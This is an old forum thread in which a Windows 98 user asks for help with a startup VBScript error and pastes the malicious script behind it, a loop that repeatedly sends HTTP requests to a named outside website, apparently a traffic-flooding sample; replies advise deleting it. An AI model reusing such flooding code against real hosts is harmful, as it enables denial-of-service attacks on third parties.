|
|
|||||||||
|
|||||||||
| |||||||||
|
|
|
| |||||||||
![]() |
|
|
«
Previous Thread
|
Next Thread
»
|
Thread Tools | Search this Thread | Rate Thread | Display Modes |
|
#1
|
|||
|
|||
|
When I turn my PC on I get the following message, and I cannot access any of my jpeg files.
Script c:\WIDOWS\SYSTEM\Explorer5.vbs Line 5 Char 22 Error Syntax Error Code 800A03EA Source Microsoft VBScript compilation error When I open this file c:\WIDOWS\SYSTEM\Explorer5.vbs I retrieve the following script On Error Resume Next set wsTCP=CreateObject("oswinsck.TCP") Head = "GET " & "http://www.nymex.com" & " HTTP/1.0" & vbCrLf & "Accept: */*" & vbCrLf & "User-Agent: " & "Mozilla/4.0 (compatible; MSIE 6.0; Win32)" & vbcrlf & "Host: 127.0.0.1" & vbCrLf & vbCrLf Do If wsTCP.Connect("", ) = 0 Then wsTCP.SendData Head wsTCP.Disconnect End If loop Can anyone help??? - Thanx!!! |
|
#2
|
|||
|
|||
|
What is this a startup script?? I think you may be in the wrong category here....
Last edited by k0r34nb0y : July 17th, 2004 at 08:40 PM. Reason: me and my fast, sloppy typing... |
|
#3
|
|||
|
|||
|
Moved from asp to spyware forum
__________________
====== Doug G ====== I didn't attend the funeral, but I sent a nice letter saying I approved of it. --Mark Twain |
|
#4
|
||||
|
||||
|
Delete the script then it shouldn't run.
__________________
Miscellaneous Software Viper_SB Developershed E-Support Anyone else play chess? Challenge me |
|
#5
|
|||
|
|||
|
many thanks for that,
the error message no longer appears, and I am able to save jpegs. however, whatever caused the error, removed all the previously saved jpegs, and I have no back up. properties will show the location of the jpeg, but the it has 0 bytes would you know of any way I could retrieve these lost files on Windows 98??? once again - many thanks!!! |
![]() |
| Viewing: Dev Shed Forums > System Administration > Antivirus Protection > VBScript compilation error 800A03EA |
| Thread Tools | Search this Thread |
| Display Modes | Rate This Thread |
|
|
|
|